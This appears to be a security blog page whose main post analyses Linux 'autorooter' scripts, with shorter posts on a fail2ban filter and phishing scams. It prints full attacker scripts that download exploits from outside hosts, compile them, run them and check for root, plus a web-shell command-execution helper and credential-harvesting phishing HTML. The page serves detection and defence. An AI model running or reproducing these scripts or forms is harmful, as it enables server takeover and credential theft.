Reflection on Autorooter behaviour and facts, Step 1

Written by genuix - 26 May 2014 11:55

 

Finding malware, or any kind of virus, hidden on the Internet inside legitimate websites isn't new; if you don't know it yet, the #MalwareMustDie group is doing its best to clean the network of this kind of thing.

As you may know, they are quite efficient at it ;-)

This has to be pointed out, and action has to be taken, to stop "too easy" autorooters from spreading worldwide and contaminating servers worldwide.

They can be used in many ways on most Linux/Unix-like and now Mac OS X servers. The first step is to upload the malicious script by whatever means available (for instance by finding a vulnerable CMS or PHP script such as WordPress, Joomla and so on).

While sleuthing through many websites, underground and aboveground, my attention was caught by a whole family of scripts known as autorooters. They are written in different programming languages such as Python, Perl, PHP, ASP or Bash (in most cases), and more rarely compiled from C.

These scripts contain only simple code, no frills, aiming at effectiveness on most Linux/Unix systems by being as generic as possible, which makes them as portable and effective as possible.

The script itself starts with a header line pointing to the interpreter to use (as usual for any kind of script), followed by a few words from the authors:

Let's begin with a simple one:

#!/bin/sh 
# IrIsT Auto Rooter Exploiter Script v.1.0 
# Author : Beni_Vanda 
# IrIsT.Ir 
# Greetz to : Amir ,C0dex ,B3HZ4D ,TaK.FaNaR ,Dead.Zone ,M3hdi ,AlrZ , , Dr.Tofan and All Members In Www.IrIsT.Ir 

# Did the last exploit give us root? uid 0 means we are done; otherwise delete the
# failed binary and let the caller move on to the next one.
# (The original declared these with bash's "function" keyword, which fails under a
# POSIX /bin/sh such as dash; the portable form below behaves the same in bash.)
Is_Rooted() 
{ 
 if [ "$(id -u)" = "0" ]; 
 then 
 echo "Rooted :D The_End :D ... "; 
 exit; 
 else 
 rm rooter; 
 echo "Not Root :| . Try Again ... "; 
 echo ""; 
 fi; 
} 

# For every URL in Rooter_List.txt: fetch the exploit binary as "rooter",
# make it executable, run it, then check whether it worked.
Try_To_Root() 
{ 
  for line in `cat Rooter_List.txt` 
  do 
  wget -O rooter $line 
  chmod 0777 rooter 
  ./rooter 
  Is_Rooted; 
  done 
} 

# Entry point: working directory, download the list of exploit URLs, try them in turn.
main_rooter() 
{ 
 mkdir irist_rooter && cd irist_rooter; 
 wget  hxxp://benivanda.persiangig.com/autorooter/Rooter_List.txt 
 Try_To_Root; 
} 

main_rooter; 

As you can see there are (in this case) three very simple functions: one that executes every exploit listed in the file downloaded by the third function, and a second one that tests whether the attempt succeeded by checking whether the effective user id is 0.

Nothing new or special here that deserves discussion.

What I would point out as the most interesting part to me is the third function (the first one executed):

It downloads a file containing a list of URLs to exploit binaries directly from the web; those exploits are then run against the host one after another to try to own it.

The point is: the exploits seem to be hosted on a plain web server, a quiet site.

Let's take a look:

The root of the web server h00p://benivanda.persiangig.com/ lands on a front page claiming to be owned/pwned by an Iranian hacker group.

The "autorooter" sub folder is more interesting:

It contains more than a hundred exploit binaries that just have to be downloaded onto a victim server and executed. If only one of the exploits succeeds, the server is pwned.

About the hosting, simple information gathering leads to:

====== Live Reverse Lookup ===========
Host IP: 198.143.177.74
Hostname: benivanda.persiangig.com
Path: /autorooter/Rooter_List.txt

====== Live Reverse Lookup ===========
Live Reverse Lookup:     cs09-prod.1g-1t.co

====== CymRu Whois infos =============
ASN:     32475
IP:     198.143.177.74
IP Prefix:     198.143.176.0/20
Country Code:     US
Owner:     SINGLEHOP-INC - SingleHop,US

====== Standard Whois infos =========
NetRange:     198.143.128.0 - 198.143.191.255
CIDR:     198.143.128.0/18
OrgName:     SingleHop, Inc.
City:     Chicago
OrgAbuseEmail:     
StateProv:     IL
Country:     US

This web hosting company seems to have been abused for a while, as I found (at least) 4 other subdomains with the same kind of "resources"; some of the source code seems to have been in use since 2011:

benivanda.persiangig.com
bl4ck-viper.persiangig.com
net-edit0r.persiangig.com
opanic.persiangig.com
kabooos.persiangig.com

But they aren't alone in this; many other domains have been found to be owned.

Example (I shortened it, as it is very poorly coded with so many trivial lines....):

#!/usr/bin/php
<?php

######################################
#                                    #
#        Copyright © S1r_z3r0        #
#                                    #
######################################


echo "
    ___         __           ____              __ 
   /   | __  __/ /_____     / __ \____  ____  / /_
  / /| |/ / / / __/ __ \   / /_/ / __ \/ __ \/ __/
 / ___ / /_/ / /_/ /_/ /  / _, _/ /_/ / /_/ / /_  
/_/  |_\__,_/\__/\____/  /_/ |_|\____/\____/\__/  
                                                  
";

echo " 
######################################
#  PHP Script - Auto Root For Linux  #
#        Coded By : S1r_z3r0         #
#          x2[at]hotmail.fr          #
#     http://fb.com/S1r.z3r0.Jo      #
######################################
"."\n"."\n";


# Three parallel arrays with one entry per exploit: the wget that fetches it,
# the chmod, and the run command (keys run up to 63 in the full script)
$command=array(
'wget1'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/1-2',
'wget4'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2',
'wget5'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2-1',
…....
'wget60'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/ubuntu',
'wget61'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/vmsplice-local-root-exploit',
'wget62'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/z1d-2011',
'wget63'=>'wget hxxp://baributz.somewhere.com/localroot/testwork-complit/2.6.18-374.12.1.el5-2012'
);
$chmod=array(
'chmod1'=>'chmod 777 1-2',
'chmod2'=>'chmod 777 1-3',
'chmod3'=>'chmod 777 1-4',
…....
'chmod61'=>'chmod 777 vmsplice-local-root-exploit',
'chmod62'=>'chmod 777 z1d-2011',
'chmod63'=>'chmod 777 2.6.18-374.12.1.el5-2012'
);
$run=array(
'run1'=>'./1-2',
'run2'=>'./1-3',
'run30'=>'./7x',
'run31'=>'./8',
…....
'run50'=>'./exploit',
'run51'=>'./full-nelson',
'run60'=>'./ubuntu',
'run61'=>'./vmsplice-local-root-exploit',
'run62'=>'./z1d-2011',
'run63'=>'./2.6.18-374.12.1.el5-2012'
);

# Download, chmod and run each exploit in turn, printing `id` after every attempt
# so the operator can see at which one uid=0 appears
echo "Server Rooting ..."."\n"."\n";
shell_exec($command['wget1']);
shell_exec($chmod['chmod1']);
shell_exec($run['run1']);
echo shell_exec("id");
…...
shell_exec($command['wget63']);
shell_exec($chmod['chmod63']);
shell_exec($run['run63']);
echo shell_exec("id");
echo "\n"."\n"."All Done , Bye ~"."\n"."\n";
?>

In this case the coder doesn't even know about functions and routines to simplify the code.... Anyway, the interesting part is again that the exploits are located on a website belonging to another hacker, which hosts lots of exploits.

Anyway, this Baributz seems to have disappeared (since 2012), but their website is still live and distributes exploits and code useful for script kiddies or evil hackers.

More interesting is this one: it looks up exploits directly at the source, h00p://www[.]exploit-db[.]com/, a well-known reference database for exploits:

<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>exploit Root ~ JxH</title>
</head>
<body>
<div style="text-align: center;">JaBr<span style="color: red;">O</span>tHaCkEr<br>
<br>
</div>
</body>
</html>

<ol>
<strong>
<?php
#c0d3r : Al7rby
#Rights : JaBrOt HaCkEr ~ 

@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);

echo "<pre>"; 

# List the installed packages: field 1 of `yum list installed`, cut at the first '.',
# so only the bare package name survives (version, release and arch are dropped).
@unlink("jxh.txt");
execute("yum list installed |awk {' print $1 '} |awk -F'.' {' print $1 '} > jxh.txt");
$apps = @file('jxh.txt');
(!$apps) ? die("Error::jxh.txt Not Exist , Means Can't execute with PHP ."):"";

echo "<p># There is : [".count($apps)."] Application</p>";

# One exploit-db search per package name; only a link is printed, nothing is downloaded or run.
foreach($apps as $app){
  $app = str_replace(array("\n","\r"),"",$app); 
  echo (exploit_db($app)) ? "[+] Found ( <b>$app</b> ) : <a href=hxxp://www[.]exploit-db[.]com/search/?action=search&filter_description=$app>here</a>\n":"[-] Not Found ( $app )\n";
}

# "Found" simply means the search page did not contain "No results". When the fetch
# fails, $result is false, that text is absent too, and the package is reported as found.
function exploit_db($wht){
  $result = @file_get_contents("hxxp://www[.]exploit-db[.]com/search/?action=search&filter_page=1&filter_description=$wht&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="); 
  flush();flush();
  # the original used eregi(), removed in PHP 7; preg_match() with /i is the equivalent
  return (preg_match("/No results/i", (string)$result)) ? false:true;
}

# Generic "run a command whichever way PHP allows" helper, lifted from a web shell.
# winshell(), srvshell(), ffishell(), perlshell(), slashBypass() and python_eval() are
# not defined in this file, so only the first five branches can actually be reached.
function execute($command){
    global $os;
    if(function_exists('passthru')){$exec = passthru($command);}
    elseif(function_exists('system') && !$exec){$exec= system($command); }
    elseif(function_exists('exec') && !$exec){exec($command,$output);$exec=join("\n",$output);}
    elseif(function_exists('shell_exec') && !$exec){$exec=shell_exec($command);}
    elseif(function_exists('popen') && !$exec){$fp = popen($command,"r");
    {while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}$exec = convert_cyr_string($result,"d","w");}
    elseif(function_exists('win_shell_execute') && !$exec){$exec = winshell($command);}
    elseif(function_exists('win32_create_service') && !$exec){$exec=srvshell($command);}
    elseif(extension_loaded('ffi') && !$exec){$exec=ffishell($command);}
    elseif(extension_loaded('perl') && !$exec){$exec=perlshell($command);}
    elseif(!$exec) {$exec = slashBypass($command);}
    elseif(!$exec && extension_loaded('python'))
    {$exec = python_eval("import os
    pwd = os.getcwd()
    print pwd
    os.system('".$command."')");}
    elseif($exec){return $exec;}
} 

?>
</strong>
</ol>
<html>
<head>
<title></title>
</head>
<body>
<div style="text-align: center;">© <span style="font-weight: bold;">J<span style="color: red;">x</span>H</span> 2010<br>
</div>
<div style="text-align: center;"></div>
</body>
</html>

As you can see with the `yum list installed` command, the script first lists all installed packages (as the issued command is yum, this is aimed at RedHat/Fedora/CentOS-flavoured Linux distributions, except that you can install the yum package manager on Debian too.... anyway).
The two awk calls keep only the first field and then cut it at the first '.', so what ends up in jxh.txt is the bare package name (httpd, kernel, openssl...): the version and release are thrown away, and the "Installed Packages" header line goes in as a package too. For each name it then queries the exploit-db search page (filter_platform=16) and prints a link whenever the answer does not contain "No results". So, contrary to what it looks like at first sight, it does not match on version and release, and it neither downloads, compiles nor runs anything: it only tells the attacker which package names have any exploit at all on exploit-db, which for names like kernel or bash is always the case. There is also a flaw in exploit_db(): when file_get_contents() fails (no outbound HTTP from the web server, or exploit-db refusing the request), $result is false, the text "No results" is naturally absent, and every package is reported as "[+] Found".
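To make the gap between what the script looks like it does and what it actually does concrete, here is an added example of mine (not the page's code and not the script author's) that reimplements the two pieces in Python: the package-name harvesting done by the yum/awk pipeline, and the exploit_db() decision, alongside a fixed variant that tells a failed fetch apart from a genuine miss. The yum output and the search responses are constructed stand-ins; the real exploit-db markup is not reproduced, and the result marker is an assumption you would replace with something taken from the actual page.

```python
"""Reimplementation of the jxh script's package harvesting and exploit-db decision logic."""
import re
from typing import Callable, List, Optional, Tuple

# Constructed sample of `yum list installed` output (not captured from a real host).
YUM_OUTPUT = """\
Installed Packages
bash.x86_64        4.1.2-15.el6_4        @anaconda
httpd.x86_64       2.2.15-29.el6.centos  @base
kernel.x86_64      2.6.32-431.el6        @anaconda
openssl.x86_64     1.0.1e-15.el6         @base
"""


def harvest_names(yum_text: str) -> List[str]:
    """What `awk {'print $1'} | awk -F'.' {'print $1'}` leaves: field 1 cut at the first '.'.
    Version, release and architecture never reach the search; the header line becomes 'Installed'."""
    names = []
    for line in yum_text.splitlines():
        fields = line.split()
        if fields:
            names.append(fields[0].split(".", 1)[0])
    return names


def harvest_name_versions(yum_text: str) -> List[Tuple[str, str]]:
    """What a version-aware scanner would have to keep instead: (name, version-release) per data line."""
    pairs = []
    for line in yum_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and "." in fields[0]:  # skips the 'Installed Packages' header
            pairs.append((fields[0].split(".", 1)[0], fields[1]))
    return pairs


# A fetcher returns the page body, or None where PHP's file_get_contents() would return false.
Fetcher = Callable[[str], Optional[str]]


def lookup_original(name: str, fetch: Fetcher) -> bool:
    """Mirrors exploit_db(): 'found' unless the page contains 'No results' (case-insensitive).
    A failed fetch yields no text at all, so it cannot contain 'No results' and is reported as found."""
    page = fetch(name) or ""
    return re.search("No results", page, re.I) is None


# Marker for "at least one result row" in the constructed stub pages below. For a real
# search page you would take a marker from its actual markup (assumption, not exploit-db's HTML).
RESULT_MARKER = "<!-- result-row -->"


def lookup_fixed(name: str, fetch: Fetcher) -> Optional[bool]:
    """Hardened decision: None when the fetch failed, True only on a positive result marker."""
    page = fetch(name)
    if page is None:
        return None
    if re.search("No results", page, re.I):
        return False
    return RESULT_MARKER in page


# Constructed stand-ins for the search response.
STUB_PAGES = {
    "httpd": "<html>" + RESULT_MARKER + "exploit list</html>",
    "openssl": "<html>" + RESULT_MARKER + "exploit list</html>",
}


def stub_fetch(name: str) -> Optional[str]:
    return STUB_PAGES.get(name, "<html>No results</html>")


def offline_fetch(name: str) -> Optional[str]:
    return None  # outbound HTTP blocked: file_get_contents() returned false


if __name__ == "__main__":
    for app in harvest_names(YUM_OUTPUT):
        print(f"{app:10} original/online={lookup_original(app, stub_fetch)!s:5} "
              f"original/offline={lookup_original(app, offline_fetch)!s:5} "
              f"fixed/offline={lookup_fixed(app, offline_fetch)}")
```

Run offline, lookup_original() reports every package, the "Installed" header included, as found; lookup_fixed() returns None for all of them, which is the honest answer. harvest_name_versions() shows the extra field the script would have needed to keep before version matching was even possible.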

Another interesting way to do the same thing is to use the well-known website "Pastebin[.]com", used to share simple text files or information with anybody, or with yourself, always available wherever you are, as simply as copy and paste.

Example:

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r ultimate )
#new links for exploits cuz we will be down for some time, check
#forum for new version with r00tw0rm.com links and updates
use strict;
use warnings;

print "###########################################################\n";
print "#   (Beta 1.0)   Ultimate Auto rooter(ultimate) by CrosS   #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 rootult    => To root                         #\n";
print "#    perl $0 del        => Delete Exploit                  #\n"; 
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter           #\n";
print "#                  for grsec+PaX protected kernels =)      #\n";
print "#   in case of error mailto: mr.0x0day[AT]hotmail.com      #\n";
print "#                                                          #\n";
print "#        Thanks to: 1337day cr3w                           #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

my $mode = defined $ARGV[0] ? $ARGV[0] : '';

# "rootult": for each kernel branch, fetch the exploit source from a Pastebin raw URL
# (paste IDs masked as MMMMMMMM), rename it, compile it, run it and print uname/id so
# the operator can see whether uid=0 appeared. The stray "V9" and the broken spacing
# in the original mv commands (which made them fail) are fixed here.
if ($mode =~ /rootult/){
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv 'raw.php?i=MMMMMMMM' 2.6.18-ultimate.c");
system("gcc 2.6.18-ultimate.c -o 2.6.18-ultimate");
system("chmod 777 2.6.18-ultimate");
system("./2.6.18-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv 'raw.php?i=MMMMMMMM' 2.6.33-ultimate.c");
system("gcc 2.6.33-ultimate.c -o 2.6.33-ultimate");
system("chmod 777 2.6.33-ultimate");
system("./2.6.33-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv 'raw.php?i=MMMMMMMM' 2.6.34-ultimate.c");
system("gcc -w 2.6.34-ultimate.c -o 2.6.34-ultimate");
# This exploit needs CAP_SYS_ADMIN; setcap through sudo only works if the current
# user already has sudo rights, so on a freshly compromised web account this step fails.
system("sudo setcap cap_sys_admin+ep 2.6.34-ultimate");
system("./2.6.34-ultimate");
system("uname;id");
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv 'raw.php?i=MMMMMMMM' 2.6.37-ultimate.c");
system("gcc 2.6.37-ultimate.c -o 2.6.37-ultimate");
system("chmod 777 2.6.37-ultimate");
system("./2.6.37-ultimate");
system("uname;id");
}
# "del": remove the downloaded sources and the compiled binaries
if ($mode =~ /del/){
print "All Ultimate Exploit deleting ...\n";
system("rm raw.php*;rm -rf raw.php*;rm 2.6*;rm -rf 2.6*");
}

As seen before, a very simple Perl script with simple commands.

In this example you need to know as much as you can about the server before trying it, as you have to post the source code (binaries aren't possible through Pastebin), get the URL generated by Pastebin and include it in your script.

Once downloaded, just compile and execute.
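All three scripts shown in this post (the IrIsT shell script, the S1r_z3r0 PHP script and the CrosS Perl script) share the same chain: download, chmod, execute, check the uid. That chain is also what makes them easy to spot on disk. The scanner below is an added example (my own code, not from the page's samples or from any of their authors): it tests a script's text for each stage with simple regular expressions and pulls out the URLs as indicators. It is exercised on constructed excerpts modelled on the three samples plus a benign download script; the stage names, the three-stage threshold and the snippets are my assumptions.

```python
"""Flag scripts that follow the autorooter pattern: download, chmod, execute, check uid."""
import re
from dataclasses import dataclass

# One regex per stage of the chain, applied to the raw script text (any language).
STAGES = {
    "download":  re.compile(r"\b(?:wget|curl)\b|file_get_contents\s*\(", re.I),
    "compile":   re.compile(r"\bgcc\b", re.I),
    "chmod":     re.compile(r"\bchmod\s+(?:0?777|[ugoa]*\+x)\b", re.I),
    "execute":   re.compile(r"(?<![\w/.])\./[\w.\-]+"),          # ./rooter, './1-2', "./2.6.18-ultimate"
    "uid_check": re.compile(r"\bid\s+-u\b|[\"'(;]id[\"')]|uname;id"),  # id -u, shell_exec("id"), uname;id
}
# Defanged (hxxp) and live URLs alike, so the list can go straight to a blocklist.
URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s'\"<>)]+", re.I)


@dataclass
class Verdict:
    stages: dict
    urls: list

    @property
    def is_autorooter(self) -> bool:
        # Download + chmod + execute is the core chain; compile and uid_check only raise confidence.
        return all(self.stages[s] for s in ("download", "chmod", "execute"))

    @property
    def confidence(self) -> int:
        return sum(self.stages.values())


def classify(script_text: str) -> Verdict:
    stages = {name: bool(rx.search(script_text)) for name, rx in STAGES.items()}
    urls = sorted(set(URL_RE.findall(script_text)))
    return Verdict(stages, urls)


# Constructed excerpts modelled on the three samples discussed above, plus a benign script.
SAMPLES = {
    "sh": r"""#!/bin/sh
mkdir irist_rooter && cd irist_rooter;
wget  hxxp://benivanda.persiangig.com/autorooter/Rooter_List.txt
for line in `cat Rooter_List.txt`
do
  wget -O rooter $line
  chmod 0777 rooter
  ./rooter
  if [ "$(id -u)" = "0" ]; then echo "Rooted"; exit; fi
done
""",
    "php": r"""<?php
shell_exec('wget hxxp://baributz.somewhere.com/localroot/testwork-complit/1-2');
shell_exec('chmod 777 1-2');
shell_exec('./1-2');
echo shell_exec("id");
""",
    "pl": r"""#!/usr/bin/perl
system("wget http://pastebin.com/raw.php?i=MMMMMMMM");
system("mv raw.php?i=MMMMMMMM 2.6.18-ultimate.c");
system("gcc 2.6.18-ultimate.c -o 2.6.18-ultimate");
system("chmod 777 2.6.18-ultimate");
system("./2.6.18-ultimate");
system("uname;id");
""",
    "benign": r"""#!/bin/sh
wget -O - https://example.org/release.tar.gz | tar xz
cd release && make
""",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        v = classify(text)
        print(f"{name:7} autorooter={v.is_autorooter!s:5} confidence={v.confidence}/5 urls={v.urls}")
```

This is a triage heuristic, not a signature: a legitimate installer that does wget, chmod +x and ./configure trips the same three stages, so treat a hit as something to open and read, and feed the extracted URLs to your proxy logs or blocklist to find out which other hosts fetched them.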

Conclusion:

That is the first step on the subject I'm talking about; the next step will go deeper into the analysis.

This is only the visible part of the iceberg, as I will try to show.

Cheers all, and thanks again to the MalwareMustDie crew for their help and support.

 

Filed under: AutoRooter - Tags: autorooter malware linux security MMD MalwareMustDie -

OpenSSL Heartbleed's case helped with fail2ban

Written by genuix - 15 April 2014 16:37

By using fail2ban you can limit attempts to hack your server.

Create a filter file named, for example, filter.d/openssl-heartbeat.conf

and add to it:

[Definition]
failregex = [[]client <HOST>[]] (Invalid method in request \\x16\\x03)
ignoreregex =

 

then in jail.conf add a section like this:

[openssl-heartbeat]
enabled  = true
port     = https
filter   = openssl-heartbeat
logpath  = /var/log/apache*/*error.log
maxretry = 2

and then restart the service:

service fail2ban restart

 

If you don't already have fail2ban installed you can find it here for your flavour of system.

http://www.fail2ban.org

As far as I could see, the apache-overflows filter already seems to ban these correctly, but with this rule you can watch for this specific attempt. Two caveats when reusing it. Apache 2.4 writes the client as [client IP:PORT] in its error log, so the <HOST>[]] part of the failregex above only matches Apache 2.2 style lines; with 2.4 make the port optional, e.g. <HOST>(?::\d+)?[]]. And the bytes \x16\x03 are simply the start of a TLS handshake record (content type 0x16) sent to a plain-HTTP listener, so the filter catches any SSL/TLS scanner that hits port 80, not Heartbleed specifically: the heartbeat request itself is a record of type 0x18, sent over the TLS port, and Apache does not log it in this form. Note also that the jail bans only port https while the matched lines come from the plaintext listener; use port = http,https if you want the scanner kept off port 80 as well.
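To check a failregex before trusting it, here is an added example (my own code, not part of fail2ban or of the original post) that mimics what fail2ban does with the filter above: it substitutes the <HOST> group (the expansion fail2ban 0.8/0.9 used, assumed here), runs the regex over constructed Apache 2.2 and 2.4 style error-log lines, and counts hits per host against maxretry. It shows that the original pattern only bans the 2.2-format client, and that making the port optional fixes the 2.4 case; findtime is ignored in this model.

```python
"""Dry-run a fail2ban failregex against sample Apache error-log lines."""
import re
from collections import Counter
from typing import Iterable, List, Set

# fail2ban 0.8/0.9 expanded <HOST> to this group before compiling a failregex
# (assumed here; check the version you run). The optional prefix strips an
# IPv4-mapped IPv6 form.
HOST_RE = r"(?:::f{4,6}:)?(?P<host>[\w\-.^_]*\w)"

# The failregex from the filter file above, verbatim.
ORIGINAL_FAILREGEX = r"[[]client <HOST>[]] (Invalid method in request \\x16\\x03)"
# Apache 2.4 logs "[client IP:PORT]": make the port optional so both formats match.
FIXED_FAILREGEX = r"[[]client <HOST>(?::\d+)?[]] Invalid method in request \\x16\\x03"


def compile_failregex(failregex: str) -> "re.Pattern":
    return re.compile(failregex.replace("<HOST>", HOST_RE))


def matched_hosts(lines: Iterable[str], failregex: str) -> List[str]:
    """Host captured by every line the failregex matches, in log order."""
    pattern = compile_failregex(failregex)
    return [m.group("host") for m in map(pattern.search, lines) if m]


def banned_hosts(lines: Iterable[str], failregex: str, maxretry: int = 2) -> Set[str]:
    """Hosts with at least maxretry matching lines (findtime is ignored in this model)."""
    counts = Counter(matched_hosts(lines, failregex))
    return {host for host, n in counts.items() if n >= maxretry}


# Constructed error-log lines, not captured from a real server.
SAMPLE_LOG = [
    # Apache 2.2 style: [client IP]
    r"[Tue Apr 08 12:34:56 2014] [error] [client 203.0.113.5] Invalid method in request \x16\x03\x01",
    r"[Tue Apr 08 12:34:57 2014] [error] [client 203.0.113.5] Invalid method in request \x16\x03\x01",
    r"[Tue Apr 08 12:35:10 2014] [error] [client 198.51.100.9] Invalid method in request \x16\x03\x01",
    # Apache 2.4 style: [client IP:PORT]
    r"[Tue Apr 08 12:36:01.123456 2014] [core:error] [pid 1234] [client 203.0.113.7:51234] Invalid method in request \x16\x03\x01",
    r"[Tue Apr 08 12:36:02.654321 2014] [core:error] [pid 1234] [client 203.0.113.7:51240] Invalid method in request \x16\x03\x01",
    # Unrelated error line from a host that must not be counted for it
    r"[Tue Apr 08 12:37:00 2014] [error] [client 198.51.100.9] File does not exist: /var/www/favicon.ico",
]

if __name__ == "__main__":
    for label, rx in (("original", ORIGINAL_FAILREGEX), ("fixed", FIXED_FAILREGEX)):
        print(f"{label:8} matched={matched_hosts(SAMPLE_LOG, rx)} "
              f"banned={sorted(banned_hosts(SAMPLE_LOG, rx))}")
```

On a real host the equivalent check is `fail2ban-regex /var/log/apache2/error.log /etc/fail2ban/filter.d/openssl-heartbeat.conf`, which prints how many lines each failregex matched; if that number is zero on an Apache 2.4 box, the port is the first thing to look at.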

 

Filed under: Uncategorized - Tags: none -

Fake Google Docs Leads to info stealer

Written by genuix - 19 March 2013 15:16

A fake email from a legitimate sender (the sender must be infected) leads to a phishing website that steals usernames and passwords if the user completes the forms:

Hi, Please i want you to view the Important document i uploaded using Google Doc. i want you to see.

click on http//google.doc.com <http://sib-komfort.ru/images/sss/index.htm> and log on with your email for immediate access to view.

Obviously, once seen, the real URL isn't a Google page.

As usual, take real care of what you click on.... part of the source code shows:

<code>
<!-- GMAIL CONFIG !--> 
<div id="toggleTextgmail" style="display: none"> 
<p><img src="./Remax - Secure Login_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="gmail" method="post" action="gmail.php" onsubmit="return ValidateFormGmail()"> 
<p> 
 
				<label>Gmail Email Address:</label> 

                <br> 
				<input name="gmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Gmail Password</label> 
                <br> 
				<input name="gmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_gmail" value="Sign in" type="submit"> 
			</p> 
            </form> 
</code>

and then it redirects you to remax.com 

URLQuery result : http://62.249.178.200/report.php?id=1516639

VirusTotal result : https://www.virustotal.com/en/url/13d9e8dbf0ca342c5528c2ea099a775589c73baf7bfea85009c39e836cee738c/analysis/

Filed under: Uncategorized - Tags: none -

Fake Swisscom MMS email

Written by genuix - 12 March 2013 16:51

A fake message in Swisscom's design, announcing that you have received a new MMS, contains a virus:

Virus Total :

https://www.virustotal.com/en/file/f203....

The email contains only the subject: MMS

the Swisscom logo

the correspondent's number: +417x xxx xx xx (which tends to suggest that the sender (or the spreader) had his address book compromised).

and the paragraph:

in German (translated here):

"If the addressee cannot receive an MMS (because they have no MMS-capable mobile phone or because no MMS can be exchanged with their network provider), they receive an SMS with an MMS ID. They can retrieve the MMS with this MMS ID on the Swisscom website."

PS: Executable file under analysis, more info soon...

Filed under: Scam - Tags: scam swisscom info stealer -

Domaine Service Scam

Written by genuix - 05 March 2013 11:45

 

Just received this morning: the well-known (http://www.npinc.ca/a-domain-service-search-engine-submission-scam/) scam "Proposal for Search Engine Submission".

Full of strange behaviour:

-1 A domain service that has an email address at Hotmail (domainindo25658 at hotmail dot com)?!?!?!? No way that could be real.

-2 The requester asks you to return a FAX (I guess that's a good way to make sure you can't later deny having agreed to the solicitation).

-3 By looking at the email source you will find the script that generated the scam: X-PHP-Script: 198,8,83,250/~domainin/info/mail_new2,php for 174,36,187,73

to be continued ===>

Filed under: Uncategorized - Tags: none -
